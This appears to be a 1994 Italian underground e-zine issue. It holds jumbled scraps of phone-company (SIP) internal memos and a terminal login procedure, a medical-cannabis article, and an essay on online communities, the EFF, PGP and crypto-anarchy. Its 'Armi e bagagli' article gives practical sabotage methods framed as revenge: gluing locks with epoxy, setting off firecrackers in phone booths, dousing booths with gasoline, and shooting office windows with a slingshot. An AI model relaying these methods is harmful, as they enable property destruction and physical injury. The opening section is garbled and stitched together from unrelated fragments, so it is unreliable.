questa grave forma di disintroito per l'Azienda. : DA : DR/SI A : DR/SI-M R RE L PRC RSI PO RSI A OTBU/S2 OTTP/S2 FILIALI TUTTE UTR TUTTE UCTP TUTTE AOR TUTTE AREE DI VENDITA TUTTE AREE ASSISTENZA TECNICA BUSINESS A2/a3 Oggetto: Predisposizioni per l'avvio di TELECOM ITALIA S.TO VS. 2384 nel 1990) : si devono tuttavia tenere presenti sia l'aumento della consistenza di tali apparecchiature. poi sono stati individuati. 1. : RIF. bolle di accompagnamento etc.

---------------------------------------------------------------------------SIP Linea Territoriale Personale Organizzazione Legoland C O M U N I C A T O Si informano tutti i lavoratori interessati che a partire dal 18 giugno e sino al 07 settembre un notiziario quotidiano su tutti i soggiorni estivi potra' essere ascoltato formando il numero verde relativo ai soggiorni di seguito elencati: SOGGIORNO LIZZANO ------Soggiorno di vacanze "SIP" Villaggio Europa 40042 . TELEFO= NICO 5722122 . F. Molla ---------------------------------------------------------------------------Da un ritaglio di carta : PROCEDURA PER L'USO DEL TERMINALE ================================= ACCERTARE CHE L'INTERRUTTORE GENERALE SIA INSERITO. A disposizione per gli eventuali chiarimenti che si rendessero necessari. 5722169 E 5723287 DI TORINO PREFISSO 011. COMPORRE MEDIANTE LA TASTIERA LA SIGLA "CIC521MA" E PIGIARE IL TASTO ENTER. INSERIRE MEDIANTE LA TASTIERA IL NUMERO DI CODICE DELL'OPERATORE E LA PAROLA CHIAVE QUINDI PIGIARE IL TASTO ENTER. COMPORRE MEDIANTE LA TASTIERA LA SIGLA "CIC5-V5" E PIGIARE CONTEMPORANEAMENTE AL TASTO ALT IL TASTO CLEAR. " " " " DEL VIDEO SIA INSERITO. COMPORRE MEDIANTE LA TASTIERA LA SIGLA "SIAR" E PI= GIARE IL TASTO ENTER. N. CON IL TASTO CLEAR SI RITORNA ALLA PAGINA PRECEDENTE E CON IL TASTO ENTER SI VA ALLA PAGINA SUCCESSIVA. Sara' nostra cura inviarvi. 0534/53033 Numero verde per notiziario giornaliero 167/011115 .fase transitoria. appena definita. IN CASO DI GUASTO TELEFONARE AI N.LIZZANO IN BELVEDERE (BO) tel. la nuova carta intestata verso terzi.B. porgiamo cordiali saluti.

cappella Thing about the way .Tori amos Se tu non torni ..miguel bose' I believe Now and forever Sleeping in a car . 0433/72339 .GRESSONEY --------Soggiorno di vacanze SIP Frazione Cioarde 11025 .....R.AURONZO dI CADORE (BL) tel.. A Grande richiesta.roxette Right in The night .72334 167/861043 [N. 0125/355431 PRAGELATO --------Soggiorno di vacanze "Casa Alpina" "Don Barra" Frazione Soucheres Basses 10060 .ice mc .PRAGELATO (TO) tel..d.. hanno .. # ( ] ---------------------------------------------------------------------------E per finire .GRESSONEY ST.FORNI AVOLTRI (UD) tel.72348 Comunita' B Soggiorno di vacanze "Piani di Luzza" 33020 . 0122/78250 AURONZO ------Soggiorno di vacanze "Domenico Savio" Localita' Cosderuoibe 32041 .FORNI AVOLTRI (UD) tel. LA SIP PARADE !!! Trascritta da ICE MC A cura degli OPERATORI SIP CornFlakes girl . la chicca . 0433/72366 . JEAN (AO) tel.. Belle eh ? Le vacanze SIP sovvenzionate dal sangue che versiamo in bollette telefoniche .jam & spoon move on baby . anche il Numero verde. 0435/97311 167/860012 167/010115 167/860001 PIANI DI LUZZA -------------Comunita' A Soggiorno di vacanze "Piani di Luzza" 167/861043 33020 .

quale posto spetta alla cannabis e quale alle comuni medicine? Un occhio di attenzione agli interessi delle industrie farmaceutiche non guasterebbe.Ho voglia d'innamorarmi . ricopiata in ogni singola lettera dal foglio trovato .di A.L.d. cancro. consentirne la vendita nelle farmacie.Numero 0. E' necessario ricordare il caso dell'americano Randall. dolori cronici e Aids.. affermano gli scienziati inglesi. ma la cannabis. non ha mai neppure potuto godere del riconoscimento della efficacia terapeutica ed e' percio' esclusa dalla farmacopea ufficiale. affetto da glaucoma. Anche perche'. come dimostrano numerosi studi e pareri scientifici. a causa della illegalita' della sostanza. Ma nel rapporto danno-beneficio. in particolare. come avviene nel casi dei farmaci.hahhaha.Articolo 8 =========== MARIA JUANA =========== LA CANAPA INDIANA. sarebbe assai utile nelle terapie del dolore per i malati terminali. La notizia e' arrivata un paio di giorni fa dalla Gran Bretagna: il ministero della sanita' inglese starebbe esaminando la possibilita' di autorizzare la somministrazione della cannabis (cioe' di hashish e marijuana) sotto controllo medico.. Settembre 1994 . Giancarlo Arnao) pur non potendo compiere ricerche organiche.baccini Mm Mm Mm Mm . Press. New Haven.. La cura delle malattie I due ricercatori inglesi hanno individuato almeno otto differenti impieghi della sostanza: nei casi di glaucoma.Tozzi Gente .P. 1993) che hanno effettuato un'ampia e aggiornata ricognizione su tutti i possibili usi terapeutici della cannabis (ne ha scritto. gli effetti della cannabis si estendono ben al di la' del solo uso antidolore. una . CHE SOLLIEVO Dal Manifesto del 11 agosto 1994 . naturalmente dietro prescrizione medica. Grinspoon e Bakalar ("Marijuana: the forbidden medicine". Yale Univ.Crash Test Dummies Quando tramonta il sole .vernice Io muoio per te . ad un recente studio di due ricercatori inglesi. London. Cioe' il Paese e' a un passo dall'equipararla ai farmaci e somministrarla in ospedale e. che in tutto il mondo viene assimilata alle droghe e percio' vietata. sclerosi multipla. gia' la morfina viene ampiamente utilizzata a tale scopo perche' ha capacita' analgesiche. forse addirittura.R : Questa e' la lista completa della Hit Parade SIP.. e' riuscito ad ottenere "legalmente" per alcuni mesi per se' e per altri otto ammalati di glaucoma. notare l'accuratezza usata nella lingua inglese :-))) Ice MC ] -------------------------------------------------------------------------------------------------------------------------------------------The Black Page . il quale dopo una lunga battaglia. sul manifestomese del gennaio 1994 dal titolo "Farmotraffico". Pausini [N. Ci riferiamo. Il suo uso. Come e' noto.

ne' altri effetti collaterali. Infine. Numerosissimi studi hanno dimostrato che la sostanza non produce assuefazione. danni al cuore e ai reni. scrivono Grinspoon e Bakalar. Quella imboccata dal governo inglese sembra una strada destinata ad essere percorsa da molti. sono rigorosamente vietati. nella paraplegia. disturbi emotivi e rischi di overdose mortali. gli anti-convulsivanti possono provocare anemie. e. nausea. come l'Olanda. impotenza.Articolo 9 ARMI E BAGAGLI Cioe' ANARCHIA SPICCIOLA PER FARE CASINO by . quello nel combattere l'inappetenza in chi e' sottoposto a chemioterapia. Settembre 1994 . che viene "curata" con oppiacei. da recenti studi sembra che il tetraidrocannabinolo (la sostanza contenuta nella cannabis) sia gia' presente naturalmente nel corpo umano. Per i malati di Aids La questione dell'uso terapeutico della cannabis e' diventata cruciale con la diffusione dell'Aids che viene curato con farmaci chemioterapici. gli effetti benefici della cannabis si sono visti nei cadi di dolori cronici e di cefalee come anche nelle depressioni. In Italia la legge JervolinoVassalli consente l'uso terapeutico delle sostanze stupefacenti intenndendo con cio' quelle contenute nella farmacopea ufficiale. La marijuana e' stata efficacemente sperimentata anche nella paraplegia e quadriplegia in sostituzione di oppioidi o tranquillanti. Altro impiego che ha dato buoni risultati. i risci di dipendenza dalla sostanza sono svidenti. Nei casi di glaucoma. il governo Usa ha rifiutato di includere hashish e marijuana nella categoria dei farmaci liberamente prescrivibili dai medici privati. [N. L'obiezione piu' frequesnte all'uso terapeutico della cannabis riguarda la sua presunta capacita' di produrre assuefazione. Infine.d. per converso. che non producono dipendenza. Nonostante questa ampia letteratura. e nonostante la stessa Dea (la polizia antidroga statunitense) abbia dovuto ammettere che "la cannabis e' una delle sostanze farmacologicamente piu' sicure". sono stati riscontrati effetti benefici e puo' sostituire i farmaci anticonvulsivi (che provocano molti effetti collaterali) e cosi' anche nella sclerosi multipla in sostituzione dei farmaci tranquillanti in alte dosi. Nei casi di epilessia. infatti. i farmaci che andrebbe a sostituire sono in genere assai tossici: nel caso delle epilessie. non solo nei paesi piu' tolleranti e "liberali" nei confronti dell'uso della cannabis. la cannabis ha dimostrato di poter sostituire con maggior efficacia. Governo Bastaaaaardoooooooooo !!! ] --------------------------------------------------------------------------------------------------------------------------------------------The Black Page . gli antidepressivi possono provocare insonnia. in sostituzione dei farmaci antidepressivi. altri farmaci che implicavano pesanti effetti collaterali.quantita' di marijuana pari a trecento sigarette al mese. piu' esattamente nella milza. ad esempio.Numero 0. Percio' assistiamo al paradosso che gli oppiacei possono essere usati (come si sa producono dipendenza) mentre i derivati dalla cannabis. con risultati positivi riscontrati in qualche caso.R. per la sclerosi multipla alti dosaggi di tranquillanti provocano letargie e dipendenza.

perche' non scriverlo in un file e renderlo pubblico ? NON E' VIETATO ! :) PARTE 1 . opure ci LIBERIAMO di questi veleni anziche' accumularli. e se possibile resistente al fuoco. in pace con se'. E' facile. scatenando pero' delle frustrazioni che ci porteranno ad essere nervosi ed irritati. nottetempo.Vendette. Acquista ad esempio della resina epossidica in tubettu.Dupree's Paradise ----------------------------Innanzitutto una premessa : Le informazioni che seguono sono facilmente reperibili su pubblicazioni gia' esistenti in librerie o edicole. far COLARE l'intero contenuto del tubetto dentro l'UNICA serratura di accesso della sede. incassata nella porta blindata. cercando pero' delle soddisfazioni nel modo con cui questi atti vengono fatti.. Ad esempio puo' capitare di sentirsi repressi a causa dell'esosita' e delle ladronerie delle compagnie telefoniche (nel ns caso. --------------------------------Capita a volte che qualcuno si senta oppresso da tutta una serie di cose. Esempio 2) Il tipo inkazzato cola resina epossidica o silicone nelle fessure di inserimento delle monete. -------------------------------------1> Impiegato licenziato dal datore di lavoro -------------------------------------------L'impiegato in questione odia a morte i datori di lavoro. Il tutto con una serratura particolare. =================== Alcune volte i casi della vita sono strani. 2) Persona frustrata dal sistema. Ora. Ogni tanto qualcuno ci fa veramente del male. Quindi. Liberarsi vuol dire quindi AGIRE per dar sfogo (controllato) al nostro istinto che vuole prendersi la rivincita. Questo impiegato "A" lavorava in una sede chiusa da porte blindate e vetri anch'essi blindati. piu' sollevato. tutto blindato. Possiamo quindi immaginare che una persona "A" che ha subito molto. o reprimiamo questo nostro desiderio. Proviamo ad immaginarci come ! Esempio 1) La persona infila un "raudo" o "minerva" acceso nello sportellino della restituzione monete della cabina. felice.. Proviamo ad immaginare alcuni scenari. della resina termoindurente speciale ad uso industriale. MOLTO. ok ? L'impiegato acquista diversi prodotti. Qui lo scenario si fa variabile. se tale materiale viene tranquillamente pubblicato su libri o riviste. Il raudo esplode facendo saltare lo sportellino trasparente del vano di restituzione monete. E' fondamentale scegliere una resina che sia difficile da sciogliere con solventi . o il "Manuale del terrorista". Quindi possiamo immaginare una persona che cerchi di sfogare queste sue frustrazioni tramite deplorevoli atti di vandalismo. La persona in questione potrebbe quindi prendere di mira le cabine telefoniche. e scatta in noi il desiderio di rivincita che e' insito nel nostro orgoglio personale. insomma cazzo. o del semplice Attack. blindata. una : la SIP). come la raccolta "Commando". sicuro di aver fatto la cosa giusta. Di fatto questa azione blocca le cabine !!! . Idem dicasi per le porte della macchina del datore di lavoro che cosi' non potra' infilare le chiavi. da un'altra persona "B". desideri "vendicarsi" della persona "B" in modo da prendersi una rivincita morale e sentirsi quindi meglio. del Silicone.

amplessi condotti a distanza con l'ausilio di apposite periferiche. ****************************************************************** 1. Spesso esistono ampi portoni in cristallo.Numero 0. costituiscono degli splendidi fenomeni da baraccone strettamente imparentati con la realta' virtuale e piu' in generale con l'intero universo cyberpunk: coppie che si conoscono e si sposano online. e' rimasto poi inedito. patria.Esempio 3) Il tale cosparge la cabina del telefono e il lettore di schede di BENZINA. il pubblico previsto per questo pezzo era quello classico di una rivista come DECODER. della progressiva opera di cablaggio e interconnessione del globo. giornali locali) Esempio 4) Il tipo si organizza con fionda e pallini di acciaio. alla luce delle proposte uscite anche in Italia in seguito al crackdown di maggio 1994. Note: 1. dal punto di vista sociologico. liti. :) Dupree's Paradise ----------------------------------------------------------------The Black Page . 2. Comunita'. Settembre 1994 . i cui lettori sono gia' svezzati per quanto riguarda i temi generali ma non padroneggiano necessariamente lo slang telematico. appartenenza. (Fonti Anonime. Che peccato non aver trovato l'articolo !! In compenso avete letto quello relativo alle stime dei danni .Articolo 10 Quanto segue e' stato scritto nel gennaio 1994 (quindi *ben prima* dell'italian crackdown). rapporti d'affari. . costituiscono il risultato piu' interessante. Per chi le vuole intendere cosi'. le net-communities. Nella maggior parte dei casi l'esplosione pare abbia fatto saltare il frontalino metallico dei lettori di schede. telenovelas sentimentali vissute in prima persona. Concepito per essere pubblicato su DECODER #9. Luogo. La maniglia del portone dapprima e' rimasta a mezz'aria e poi e' caduta per terra. cittadino. identita'. Anche le cabine della Sip pare siano state spesso prese di mira da vandali. vorrei sottolineare a scanso di equivoci che gli apprezzamenti rivolti all'EFF e a quella che nelle conclusioni ho chiamato "Libera Repubblica del Ciberspazio" sono evidentemente ironici. e noi abbiamo avuto notizie di gravi incidenti occorsi a vandali che abbiano agito in modo incauto... in cui risulta che le cause di questi atti di vandalismo sono spesso da ricercare nella decadenza dei valori della societa' attuale che pare non offrire vie di sfogo ai giovani. andando a centrare i vetri delle centrali Sip e delle sedi. tutto questo e altro ancora diventa il circo-Spettacolo della societa' post-moderna. La benzina ha un alto potere esplosivo. Risulta cio' da uno studio sociologico effettuato dalla Sip e pubblicato sulla loro rivista interna "Selezionando" di qualche mese fa. La democrazia elettronica e il suo business ============================================== Le comunit in rete. Un vandalo ci ha confessato di aver frantumato uno di questo portoni in cristallo con un colpo di fionda. fagocitato dai media e dal loro pubblico.

musica. un passato lavorativo nel campo ed una conoscenza non superficiale delle dinamiche di rete. l'organizzazione nata in seguito all'operazione Sun Devil per tutelare i diritti dei cittadini nel ciberspazio. Conclude cosi' : . Il traffico dovrebbe essere costituito da ogni tipo di informazione digitale: messaggi o testi. Proliferano gli studi sulle comunita' virtuali e sulla fenomenologia delle relazioni sociali sulle reti telematiche. Un'infrastruttura comunicativa costituita da soluzioni tecniche di avanguardia. in modo che tutti possano vedere dove finisce il mondo e fino a dove e' ragionevole spingersi. Clinton ha vinto ed uno dei punti fermi della sua amministrazione rimane la costruzione delle Information Superhighways. Panico. Fiore all'occhiello dell'EFF e' l'elaborazione di una serie di proposte operative per l'attuazione concreta di questo network. capace di collegare in tempo reale qualsiasi punto dell'immensa nazione americana. qui si parla di diritti costituzionali nella Nuova Frontiera.3 July/August 1993 ruota intorno ad un lungo e articolato intervento del solito Mitchell Kapor ("fondatore della Lotus Dev. Leggi. Chaos.l'EFF come la finanziaria degli hackers? "nossignori. sviluppatore di Lotus 1-2-3.. A partire da questo titolo il self-made man Kapor espone paure e speranze a proposito della futura infrastruttura comunicativa.*ehi. Disorientamento.straniero. Corporation. Ordine.si dice sia stata un'idea del suo vice Al Gore. com' e' la vita laggiu' ? Il ciberspazio e le comunita' che lo abitano esistono dal Principio dei Tempi. le autostrade della trasmissione dati. La "moderazione" di queste indicazioni e la "rispettabilita'" dei membri fondatori hanno consentito all'EFF di superare quella diffidenza e quell'alone cospirativo con cui era stata guardata in un primo momento . ed in effetti la campagna presidenziale statunitense 1992 di Bill Clinton ha avuto un occhio di particolare riguardo verso gli utilizzatori delle reti telematiche . televisione e video. compaiono improvvisamente gli esperti che spiegano cosa sta accadendo e gli indigeni da intervistare . Diritti. ha sempre posto al centro dei propri obiettivi la costituzione di un network globale (un National Public Network o una National Information Infrastructure) che dovrebbe fare da razzo vettore per la cultura e l'intrattenimento della societa' americana del terzo millennio. immagini." just-in-case-you-don't-know-who-I-am). *Voila'*! Wired 1. Da parte sua l'Electronic Frontier Foundation. Nuovi steccati con cui marcare i limiti della Frontiera. I Pionieri hanno iniziato a muoversi per portare la loro civilta' ai Selvaggi. tutto idealmente a costi accessibili da parte di qualsiasi cittadino.. si parla della storia degli Stati Uniti d'America e Thomas Jefferson sarebbe orgoglioso dei ragazzi dell'EFF". co-fondatore dell'EFF. richiamandosi agli ideali americani di sempre. ma solo da poco e' iniziata la loro colonizzazione. Tutto si ripete e tutto muta una volta fatto il suo ingresso nella Matrice. Howard Rheingold annuncia che si e' definitivamente avviato il cammino verso la democrazia elettronica. Where is the Digital Highway Really Heading? The Case for a Jeffersonian Information Policy. proposte che sono state sottoposte ormai piu' volte all'attenzione del Congresso degli Stati Uniti e a numerose sottocommissioni per le telecomunicazioni.

Sun Devil e' gia' lontano.Vice President Al Gore announced at the National Press Club today a long-term White House telecommunications policy initiative that incorporates the major elements of the Electronic Frontier Foundation's Open Platform policy recommendations. le norme di comportamento online rimangono per lo piu' non scritte senza creare particolari problemi. outlined five policy principles for the National Information Infrastructure (NII). un po' liberal. e quand'anche qualcuno assuma atteggiamenti devianti e' sufficiente la riprovazione generale per riacquistare l'omeostasi. instant databases . Kapor said that he is "honoured" by the reference in Gore's speech.8. Un ottimo esempio di comunita'. movies on demand. and distributed two-way switching. which credited EFF co-founder Mitchell Kapor for articulating the need for an "open platform" information infrastructure. 28 dicembre 1993: Subject: Gore Endorses EFF's Open Platform Approach. true communications among the people. teleconferencing. 2. Comunita virtuali e comunita' reali ====================================== La comunita' virtuale di cui parla Howard Rheingold nel suo ultimo libro e nell'articolo delle pagine precedenti e' quella di The WELL. an open architecture. Washington -. Alla Frontiera sta arrivando la Civilta'.The Jeffersonian ideal . It's our choice to make. "I am looking forward to working with the White House and the Congress to help see this thing through. The WELL e' anche un buon esempio di come lo sviluppo di una personalita' in rete (una personalita' solo apparentemente "virtuale") vada ad integrarsi con il resto delle esperienze che . The Vice President's speech. "President Clinton and Vice President Gore deserve great credit for being the first Administration in over a decade to offer a comprehensive approach to telecommunications policy.a system that promotes grass-roots democracy. e si vede. Ex-fricchettoni californiani ora trasferitisi nel computer business. Kapor e' uno che sa quello che dice. Let's not blow it.is composed og high bandwidth." Kapor said. and cheap. diversity of users and manufactrers. and that they see Open Platform and open access as just as important as competition. Ma cosa succedera' ora che anche il Presidente degli Stati Uniti se ne e' accorto. "I'm awfully happy that the Open Platform is right in the middle of the Administration's infrastructure strategy. and all the dazzling goodies of home shopping. a dire il vero: un insieme di tratti culturali comuni." Guardie e ladri brindano insieme. *ed e' d'accordo con lui*? EFFector Online (organo elettronico di informazione quindicinale della fondazione). ma tutto sommato "gente per bene". Volume 6 No.

Ribelli online e offline. da chi la vive e dagli altri. vengono digitalizzati e fatti circolare in rete in . in altri luoghi si sviluppano le espressioni online del radicalismo politico piu' spinto. ateo esistenzialista o cyberpunk viaggiano su binari diversi. Certo i diversi mondi conservano dei legami tra loro ed e' compito del soggetto trovare la funzione che gli permetta di sentirsi a casa propria in ognuno di essi. Se The WELL e' la comunita' virtuale di Howard Rheingold e del sogno americano.magari persona "normale" e rispettabile nella vita di tutti i giorni sente il bisogno di rendere completamente indipendente una delle sue personalita' dalle altre. giocatore di golf. *Tabula rasa*. l'orgasmo della modernita'.un individuo conduce nella vita di tutti i giorni. amante. ordinata e competitiva. lavoratore. sottraendola al dominio della gabbia familiare/lavorativa/ricreativa in cui si e' andato a rinchiudere. Chi si comporta come uno stronzo e' uno stronzo. cio' non significa che la persona in rete sia necessariamente anonima. La vita in rete e' nient'altro che un binario in piu'. In altri casi invece la rete e' solo una dimensione in piu' nella quale ribadire la propria autonomia. La navigazione del soggetto in quest'universo da' luogo alla definizione della persona in rete: ogni azione. Rete come paradigma di uno dei tanti mondi della societa' "complessa".e' un progetto editoriale che vede nelle risorse telematiche un'arma da guerra di cui fare buon uso: opere storiche del pensiero libertario e anarchico. Chi entra in rete per la prima volta non e' nessuno. una sfera di significati in cui si entra e si esce con l'aiuto di una tastiera o di un datasuite. Tuttavia la vita del cybernauta e' potenzialmente schizofrenogenica: in rete egli trova finalmente le condizioni migliori per lo *split*. come identita' concreta che si affianca alle altre gia' esistenti. marito. processi di socializzazione. fanzines. ogni bit comunicativo costituisce un mattone nella costruzione di un'identita' che viene riconosciuta. Ma quando anche questo split avvenga. Lo stacco definitivo di una personalita' dalle altre.ad esempio . saggi. sanzioni. istituzioni. ruoli. Oggi i ruoli di padre. ma anche una finestra di liberta' per chi (si) e' condannato a vivere nel recinto dell'ortodossia. nel proprio ruolo di leader in una conferenza elettronica hack/phreack come con i colleghi del lavoro quotidiano allo sportello bancario. Il c-spazio mette a disposizione gli strumenti per costruire un Se' online attraverso dinamiche molto simili a quelle tradizionali: dall'interazione con l'ambiente emergono infatti i contorni di una struttura sociale "virtuale" fatta anch'essa di norme. La capacita' di gestire molteplici ruoli e' un requisito essenziale del "soggetto moderno": dai tempi della rivoluzione industriale l'appartenenza ad una corporazione non esaurisce piu' le coordinate che identificano un individuo nella societa'. SPUNK Press . Un rimedio tardivo e parziale forse. a chi ci vive rimane il compito di come integrare (o non integrare) la sua persona in rete con la sua persona negli altri mondi: quanto a questo. i sistemi telematici XXX-rated dal contenuto erotico sono spesso terreni di gioco per chi .

e chi ne ha favorito la distribuzione all'estero attraverso Internet di "esportazione in paesi stranieri di tecnologie e informazioni che possono nuocere alla sicurezza degli Stati Uniti d'America".3a. possono vedersi di persona o usare altri mezzi (telefono. Dagli interstizi virtuali piu' reconditi il flusso comunicativo torna di nuovo a replicarsi su supporto fisico attraverso opportuni gateways con il mondo esterno (ovunque ci siano un pc e una stampante). radio. Scozia. Ognuno genera in privato la propria coppia: una e' la chiave privata che andra' tenuta segreta (ed alla quale e' associata per maggior sicurezza una parola d'ordine). tre giorni dopo il rilascio ufficiale della versione 2. A e B devono trovare il modo per concordare e scambiarsi una chiave. altro) ma in ogni caso esiste la possibilita' che la chiave venga intercettata nel momento in cui passa da uno all'altro degli interlocutori. La comunita' virtuale di SPUNK proviene da un processo di morphing che coinvolge esperienze di vita reale di tutto il mondo. Anche perche'. Il nemico pubblico numero uno: la crittografia a chiave pubblica ======================================================================== L'evento dell'anno 1993 nel cyberspace si chiama PGP. il progetto percorre il c-spazio in direzione trasversale attraverso continue ramificazioni.Phil Zimmerman . PGP era in Italia completo di codice sorgente importato attraverso il cyberspace da alcuni dei piu' attenti e cattivi technopunx nostrani. 3. a dimostrazione della continuita' tra esperienze "dentro" e "fuori" la rete. La National Security Agency e l'FBI hanno tentato di bloccarne la diffusione accusando l'autore . in ogni caso.infinite copie. Come mai tanto casino a causa di un programma che e' una semplice implementazione di algoritimi matematici studiati da anni? La crittografia a chiave pubblica nasce per ovviare a uno dei principali inconvenienti della crittografia tradizionale: la disponibilita' di un canale di comunicazione sicuro attraverso il quale scambiarsi la chiave di codifica/decodifica. Se A vuole mandare un messaggio segreto a B. Lo stesso e' accaduto per gli altri paesi. Pretty Good Privacy. Nel luglio 1993. Italia e Stati Uniti interagiscono e negoziano la loro cooperazione online mantenendo un filo invisibile tra comunita' "reali" e "virtuali" e conservando anche nel ciberspazio gli stessi meccanismi decisionali collaudati nei tradizionali luoghi di confine come centri sociali autogestiti. squats e comuni di vario tipo. bens di una coppia di chiavi personali specifiche per ciascun individuo. l'altra e' la chiave pubblica vera e propria . La crittografia a chiave pubblica non fa uso di un'unica chiave comune a tutti i partecipanti. tale che possa essere letto solo da quest'ultimo. I membri del collettivo di coordinamento di SPUNK Press attualmente in Olanda. un nome perfetto per un pacchetto di crittografia a chiave pubblica di pubblico dominio in rete. NSA e FBI sono semplicemente arrivati troppo tardi. Si sono sollevati in difesa di Zimmerman i potenti avvocati dell'EFF e c'e' da scommettere che tutto si risolvera' in un gran polverone. le trasfigura in rete ed e' pronto a vomitarle nuovamente fuori sotto forme mutanti imprevedibili. da Internet alle reti amatoriali di BBS su linea commutata. Svezia.

Una seconda caratteristica della crittografia a chiave pubblica e' la possibilita' di firmare un messaggio con la propria chiave privata. Naturalmente A deve essere in possesso della chiave pubblica di B e per questo motivo e' interesse di B che la propria chiave pubblica venga distribuita il piu' possibile su tutti i canali del c-spazio. Amiga e UNIX. se A vuole comunicare con B. Le due chiavi si dividono i compiti: quella pubblica codifica i dati. facilmente trasportabili nel cyberspace. Ogni chiave e' costituita da stringhe di poche centinaia di bytes. Il software PGP e' disponibile su molti nodi di Cybernet. Si tratta del processo inverso: B scrive un messaggio. Le due chiavi sono legate da una relazione algebrica. Cryptoanarchy e altre storie ======================================== Lo sviluppo attuale delle reti e della tecnologia permette di pensare al ciberspazio come ad un luogo piu' ospitale di qualsiasi spazio fisico per esperimenti di nuovi modelli di comunita' libertarie. usera' la chiave pubblica di B per crittografare il messaggio. lasciandolo in chiaro (senza necessariamente crittografarlo). che non essendo in possesso della chiave segreta non avrebbero comunque piu' la possibilita' di decodificare il messaggio. tanto piu' che essa ora puo' essere vista anche da terze parti "male intenzionate".che andra' diffusa in rete. vengono trattati in testi specifici reperibili nelle librerie scientifiche. sicuro che solo B e' in possesso della corrispondente chiave privata (e della parola d'ordine) che consente di risalire al testo in chiaro. lo sottopone a verifica utilizzando la chiave pubblica di B ed ottiene la conferma che solo B puo' averlo scritto. I fondamenti della crittografia a chiave pubblica. in versioni eseguibili in ambiente MS-DOS. e sotto forma di codice sorgente compilabile su qualsiasi altra piattaforma hardware. senza poterli decodificare. A riceve il messaggio firmato. Le comuni tradizionali.un primo tentativo in Italia in questo senso e' stato intrapreso su BITs Against The Empire BBS (la tana di chi scrive). il risultato e' una firma elettronica costituita da una stringa di caratteri che viene aggiunta in fondo al testo. Cypherpunk. rimangono soggette ad attacchi di ogni tipo . ma conoscendo la chiave pubblica non e' in alcun modo possibile risalire a quella privata in tempi computazionali ragionevoli (diverse decine di anni di calcolo con la migliore tecnologia attuale). questo ha fatto nascere una delle tante mode online: la configurazione personalizzata del proprio editor allo scopo di aggiungere la propria chiave pubblica alla fine di ogni messaggio immesso in rete. sempre l'esigenza di diffondere il piu' possibile le chiavi pubbliche ha condotto alla creazione di archivi/database in cui si puo' eventualmente cercare la chiave di una persona specifica con cui si vuole comunicare in perfetta privacy . 4. Detto per inciso. lo sottopone ad un algoritmo in cui vengono usati come argomenti la chiave privata (e la parola d'ordine) ed il messaggio stesso. quand'anche riescano a trovare un proprio equilibrio. inoltre. che in un'area file apposita conserva tra le altre le chiavi dei piu' assidui frequentatori di Cybernet. cioe' cio' che spiega come tutto questo sia possibile.

Un programma come PGP permette un grado di confidenza perfetto tra persone che non si sono mai incontrate fisicamente. Posso mandare un messaggio (o un file binario. sui nodi che cadono sotto la giurisdizione statale. Internet. Insomma. al servizio dell'individuo e delle sue liberta'. posso essere assolutamente sicuro che il messaggio (firmato) che ho ricevuto da B puo' essere stato scritto esclusivamente da lui. sicuro che soltanto B potra' leggerlo. posso scegliere quale delle mie molteplici identita' rivelare. sul denaro digitale gestito da personepseudonimi e dalle loro chiavi pubbliche (un esempio e' l'istituto di credito fondato ad Amsterdam da David Chaum. All'occurrenza i nascenti sistemi di remailing e i programmi hackerati di fake-mail la rendono anche anonima: chi riceve il mio messaggio non puo' sapere che sono stato io a mandarlo. e a chi. se io non voglio. E' la vittoria definitiva dell'attore sociale che costruisce (o distrugge) invece di subire. dei flussi di denaro incontrollati da un conto bancario all'altro. E' caotica: due nodi possono essere collegati tra loro attraverso strade diverse. tanto che nemmeno lo stesso B potrebbe piu' negarlo. con dati di qualsiasi tipo) a B. ai tentativi di creare collettivita' non-statali in sperdute isolette del Pacifico o agli sgomberi di molti Centri Sociali Autogestiti in Italia. In un simile scenario la crittografia a chiave pubblica costituisce il sistema di innesco di questo ordigno . nello spazio virtuale criptoanarchico posso scegliere a quale livello condurre le mie relazioni sociali e le mie transazioni economiche. permette confidenza e privacy tra pseudonimi e non tra le rispettive identita' globali. che da anni si occupa di crittografia al locale Center of Mathematics and Computer Science). la vittoria del mondo delle possibilita' opposto a quello delle qualita' ascritte e del pregiudizio. *Fuck Off*! I pruriti dei benpensanti servono a ben poco. E' nata durante la guerra fredda per resistere ad un attacco nucleare sovietico. esattamente quanto i casi sollevati da NSA e FBI o le interrogazioni sul possibile uso di questa privacy da parte di . piu' precisamente. Allo stesso modo puo' essere anche il regno della cospirazione. Ma tutte queste relazioni coinvolgono solo gli pseudonimi a cui sono associate le chiavi pubbliche e non le altre facce della personalita' del soggetto "moderno".la molotov digitale piu' potente che sia mai stata costruita. E posso avere piena fiducia nel flusso di dati proveniente e firmato da uno pseudonimo di cui non conosco nulla. al massimo.da parte di strutture di potere organizzate e violente. se non il suo precedente comportamento nel c-spazio. e' invece intrinsecamente decentrata ed inattaccabile. Cosa altrettanto importante. della massoneria digitale. E' transnazionale: le legislazioni delle singole nazioni valgono. la distruzione completa di uno qualsiasi dei suoi nodi non ha nessun effetto sulla vita globale della rete. Basti pensare all'apocalisse di Waco in Texas. Stanno nascendo banche e sistemi di acquisto e pagamento basate sul *digicash*. e tantomeno la sua identita' legale anagrafica. La Matrice.

Iniziamo a diventare obiettivi di campagne elettorali e di posta-spazzatura elettronica. Conclusioni ============== Tiriamo le fila di tutto questo discorso. cyber-amici e cyber-figli-di-puttana. l'ufficio anagrafico e il bar di quartiere. Tutto questo impone delle scelte anche a chi finora e' sfuggito alla propria mutazione in una direzione precisa.terroristi e narcotrafficanti internazionali. E' un classico della dialettica tra individuo e sistema sociale: accanto al vigore normativo e alla dimensione burocratica/razionale. Naturalmente ci sono pro e contro ed e' possibile che anche Cybernet decida di dotarsi in futuro di una policy scritta. Oppure si puo' dissolvere il proprio pseudonimo e teletrasportarlo altrove. La colonizzazione del ciberspazio. ambizioni personali. Le forme di vita uscite dal primordiale brodo di coltura di questi primi anni di cataclismi della telecomunicazione globale. le prospettive della crittografia e della cryptoanarchia. inarrestabili. perfino per una *Grande Societa'*. Si puo' decidere di unirsi agli sforzi di chi lotta per una Societa' Giusta. l'Electronic Frontier Foundation. Dal gennaio 1994 sono entrati in vigore in Italia nuovi articoli di legge specifici sui reati informatici. da solo. La cryptoanarchia e' arrivata assieme ai microprocessori degli anni '90. *Gia' visto*. l'esperienza condotta finora su Cybernet si e'basata invece proprio sull'assenza esplicita di responsabili e di norme codificate. in cui oscilla l'altalena tra oggettive questioni di vivibilita'. . Allo stesso modo che nel mondo fisico alcune zone piu' di altre sfuggono alla pervasivita' delle istituzioni strutturate: la cultura organizzativa di Fidonet. Lo 